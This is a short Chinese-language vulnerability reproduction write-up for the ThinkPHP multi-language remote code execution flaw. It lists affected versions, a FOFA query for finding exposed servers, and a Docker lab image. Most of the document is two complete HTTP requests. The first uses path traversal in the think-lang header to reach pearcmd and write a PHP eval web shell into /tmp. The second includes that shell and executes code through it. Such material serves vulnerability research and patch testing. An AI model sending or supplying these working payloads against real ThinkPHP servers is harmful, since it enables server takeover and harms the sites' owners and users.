ThinkPHP 多语言RCE

漏洞复现
, ,

Think PHP 多语言RCE

影响范围

本次漏洞影响范围如下:

1
2
3
v6.0.1 < Thinkphp < v6.0.13 
Thinkphp v5.0.x 
Thinkphp v5.1.x

FOFA 语法:

1
header="think_lang"

要求:

1
2
1、需要Thinkphp开启多语言功能
2、需要有pearcmd扩展

复现环境:

1
2
docker run -it -d -p 8080:80  vulfocus/thinkphp:6.0.12
访问8080

getshell

1
2
3
4
5
6
7
8
9
10
11
GET /public/index.php?+config-create+/<?=@eval($_REQUEST['w']);?>+/tmp/nihao2.php HTTP/1.1
Host: 192.168.134.154:8066
User-Agent: Mozilla/9.0 (Macintosh; M2 Mac OS X 16.12; rv:129.0) Gecko/20230101 Firefox/169.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Connection: keep-alive
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1

image

phpinfo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /public/index.php HTTP/1.1
Host: 192.168.134.154:8066
User-Agent: Mozilla/9.0 (Macintosh; M2 Mac OS X 16.12; rv:129.0) Gecko/20230101 Firefox/169.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../tmp/nihao2
Connection: keep-alive
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

w=phpinfo();

image